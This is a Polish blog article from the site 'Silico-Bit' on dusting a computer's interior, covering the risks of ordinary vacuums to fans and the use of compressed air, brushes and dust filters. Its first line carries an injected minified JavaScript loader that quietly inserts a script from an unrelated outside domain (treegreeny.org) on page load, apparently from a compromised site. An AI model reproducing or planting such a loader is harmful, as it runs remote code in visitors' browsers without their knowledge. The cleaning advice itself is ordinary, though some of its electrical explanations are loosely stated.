;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Odkurzanie komputera wydłuża jego żywotność? | Silico-Bit
Korzystanie ze sprzętu komputerowego jest naszą codziennością. Używamy go do pracy, rozrywki oraz wyszukiwania ważnych informacji. Wraz z upływem czasu, we wnętrzu urządzenia zbiera się kurz, który może być bardzo uciążliwy, a w rezultacie również niebezpieczny dla komputera. Jak sobie z nim poradzić i czy odkurzanie komputera zwykłym odkurzaczem jest właściwe?

Odkurzanie komputera

Dlaczego należy przeprowadzać odkurzanie komputera?

Kurz to jeden z poważniejszych wrogów komputera. Powoduje, że sprzęt szybciej się zużywa, a co najważniejsze, powoduje jego nadmierne nagrzewanie. Zbyt duża ilość kurzu pod obudową sprawia, że przegrzewają się podzespoły komputera. Analogicznie do ludzkich płuc, komputer dławi się nagromadzonymi drobinkami. Nie jest więc to zdrowe dla funkcjonowania całego sprzętu.

Elektronika rządzi się swoimi prawami. Wilgoć nagromadzona wewnątrz komputera powoduje przyciąganie drobinek kurzu. Wówczas następuje suszenie wnętrza. Niestety w związku z takim działaniem, powstają ładunki elektrostatyczne, szkodliwe, a wręcz zabójcze dla wszystkich mikroprocesorów oraz podzespołów. Ze względu na to, m.in. podczas nabywania części do komputera, otrzymujemy je w specjalnym woreczku, który chroni elektronikę przed powstawaniem ładunków.

Jak przeprowadzić odkurzanie komputera?

W związku z gromadzeniem się kurzu wewnątrz urządzenia, powinniśmy zajrzeć do niego co jakiś czas i zobaczyć, czy nadmierna ilość cząsteczek nie obciąża jego podzespołów lub czy komputer nie przegrzewa się zbyt mocno. Pamiętajmy jednak, że przed rozpoczęciem każdej pracy, należy odłączyć urządzenie od źródła zasilania. Bezpieczeństwo jest najważniejsze!

Sposoby odkurzania komputera

Chłodzenie komputera przy nadmiernym kurzu nie spełnia swojej funkcji, przez co cierpią na tym podzespoły, a także szybkość pracy urządzenia. Jeśli tylko wyczujemy dziwny zapach, dobiegający z wnętrza komputera lub będziemy wyczuwać, że mógł się on nadmiernie zakurzyć od środka, trzeba działać.

Czego na pewno nie robić? Nie używać do czyszczenia komputera zwykłego odkurzacza. Nie jest to czynność analogiczna do odsunięcia kanapy czy szafki i odkurzenia zalegającego kurzu. Komputer to urządzenie elektroniczne, którego podzespoły są bardzo delikatne. Jeden nieprawidłowy ruch i możemy bezpowrotnie zepsuć część. Tak dzieje się w przypadku wentylatora. Na skutek wyssania kurzu spod jego łopatek, wentylator może zacząć się kręcić. Nie możemy do tego dopuścić, ponieważ zadziałałby niczym prądnica, generująca ładunek elektryczny. Popłynąłby on do płyty głównej i niósłby za sobą duże ryzyko jej uszkodzenia. W związku z tym odkurzaczowi mówimy w tym przypadku nie! A jeśli już koniecznie chcemy wykorzystać go do odkurzania komputera, zmniejszmy moc ssania do absolutnego minimum, pamiętając jednocześnie, żeby przytrzymać palcem wentylator.

Najlepszym sposobem na wyczyszczenie urządzenia z kurzu jest sprężone powietrze lub pędzelek. W ten sposób delikatnie wymieciemy kurz z najmniejszych zakamarków. Ale czy ma on pofrunąć w eter i za chwilę znów osadzić się na sprzęcie? Absolutnie nie, dlatego miejmy w pobliżu włączony odkurzacz, jednak podczas czyszczenia manipulujmy pędzelkiem lub sprężonym powietrzem, a rurę odkurzacza trzymajmy w odpowiedniej odległości. Nie zapomnijmy o nawet najmniejszych zakamarkach, tam również gromadzi się kurz.

Odkurzanie komputera

Jak zapobiegać nadmiernemu gromadzeniu się kurzu?

Czyszczenie komputera mniej więcej raz na pół roku zapobiega jego uszkadzaniu przez kurz. Co jednak zrobić, aby sprzęt nie gromadził tylu cząsteczek? Jeśli pomieszczenie, w którym przebywa komputer, jest odkurzane bardzo rzadko, wiadomym jest, że sprzęt będzie zasysał ten kurz o wiele bardziej, niż w przypadku z reguły czystego pomieszczenia. Dlatego warto dbać nie tylko o sprzęt, lecz także o samą jego okolicę.

Najczęściej kurz gromadzi się za skrzynką komputera i z reguły nie zaglądamy do tych miejsc zbyt często, a powinniśmy. Zapominamy również o otworach w obudowie czy samej kratce wentylatora. To także miejsca, w których gromadzi się ogromna ilość kurzu. Jeśli przy okazji odkurzania pomieszczenia przystawimy końcówkę również w tych miejscach, komputer nie będzie się tak mocno kurzył od środka.

Wiele osób stosuje technikę niezakładania bocznych ścianek komputera, aby obniżyć temperaturę jego pracy. Nie jest to jednak dobra metoda, ponieważ wpływa to negatywnie na czystość wewnątrz urządzenia.

Istnieje jednak sposób na ochronę sprzętu przed kurzem, a mianowicie aluminiowe filtry przeciwkurzowe, które montuje się na wentylatorach. Kurz wówczas zbiera się na nich i nie wnika w głąb komputera. Poza tym łatwiej będzie nam czyścić sprzęt. Filtry kosztują kilka złotych i są dostępne w większych marketach oraz sklepach komputerowych.

Warto stosować takie zabiegi, ponieważ czas poświęcony na czyszczenie sprzętu oraz wydanie kilku złotych, nie jest współmierne do utraty danych, a w najgorszym przypadku całkowitego zniszczenia podzespołów komputera i związanych z tym kosztami serwisu.